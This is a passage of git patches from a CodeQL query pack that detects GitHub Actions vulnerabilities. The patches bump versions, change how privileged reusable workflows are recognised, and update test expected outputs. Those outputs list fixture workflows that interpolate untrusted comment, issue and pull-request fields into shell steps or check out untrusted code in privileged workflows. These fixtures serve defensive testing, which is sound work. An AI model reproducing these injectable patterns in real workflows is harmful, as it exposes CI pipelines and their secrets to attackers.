.github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | @@ -146,6 +147,7 @@ edges | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | | .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | @@ -205,6 +207,7 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | @@ -224,6 +227,7 @@ edges | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | From 1dd7c3d2ef75b8d45b1f5ec2f1cdaf3ba9cc6c27 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 22 Sep 2024 22:06:35 +0200 Subject: [PATCH 519/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8135237d6ce8..ec2e82dfe010 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.48 +version: 0.1.49 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a40d58687899..70f493e1d64b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.48 +version: 0.1.49 groups: [actions, queries] suites: codeql-suites extractor: javascript From df59e6f5d29e796702900795e4bb72daaf878bb9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 10:18:29 +0200 Subject: [PATCH 520/707] Consider a Reusable Workflow privileged if a caller is --- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 +- .../dataflow/internal/DataFlowPublic.qll | 2 +- ql/test/library-tests/test.expected | 1575 +---------------- .../CWE-094/CodeInjectionMedium.expected | 4 + .../TestRepo/.github/workflows/formal.yml | 70 + .../CWE-829/.github/workflows/formal.yml | 12 + .../UntrustedCheckoutCritical.expected | 2 + .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 8 files changed, 96 insertions(+), 1576 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2267c7ff694a..d0eb440d0d53 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -2,6 +2,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Helper private import codeql.actions.config.Config +private import codeql.actions.DataFlow /** * Gets the length of each line in the StringValue . @@ -433,7 +434,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { } ExternalJobImpl getACaller() { - result.getCallee() = this.getLocation().getFile().getRelativePath() + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 96568f86db33..fbaf44c282f4 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -72,7 +72,7 @@ class CallNode extends ExprNode { CallNode() { this.getCfgNode() instanceof DataFlowCall } - string getCallee() { result = this.getCfgNode().(DataFlowCall).getName() } + DataFlowCallable getCalleeNode() { result = viableCallable(this.getCfgNode()) } } /** diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 9205675ac0fe..fe5a2df8dd0a 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,1574 +1 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/multiline2.yml:0:0:0:0 | .github/workflows/multiline2.yml | -| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | -| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo 